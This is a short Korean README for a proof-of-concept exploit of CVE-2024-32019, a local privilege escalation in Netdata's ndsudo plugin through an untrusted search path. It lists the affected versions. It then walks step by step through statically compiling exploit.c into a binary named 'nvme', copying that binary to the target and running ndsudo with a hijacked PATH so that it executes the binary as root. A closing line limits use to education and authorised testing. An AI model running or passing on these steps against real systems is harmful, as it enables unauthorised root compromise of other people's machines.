
CVE-2024-32019에 대한 개념 증명 익스플로잇으로, Netdata의 ndsudo 플러그인에서 신뢰할 수 없는 검색 경로를 통한 로컬 권한 상승을 시연합니다. 컴파일 지침 및 배포 단계를 포함합니다.
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — ndsudo의 신뢰할 수 없는 검색 경로를 통한 로컬 권한 상승
x86_64-linux-gnu-gcc -o nvme exploit.c -static
컴파일된 바이너리를 취약한 머신으로 전송하세요.
실행 가능하게 만드세요:
chmod +x nvme
PATH 조작을 통해 취약한 바이너리를 익스플로잇하세요 (바이너리를 업로드한 동일한 경로 사용):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
이 개념 증명(PoC) 코드는 교육 및 승인된 침투 테스트 목적으로만 제공됩니다.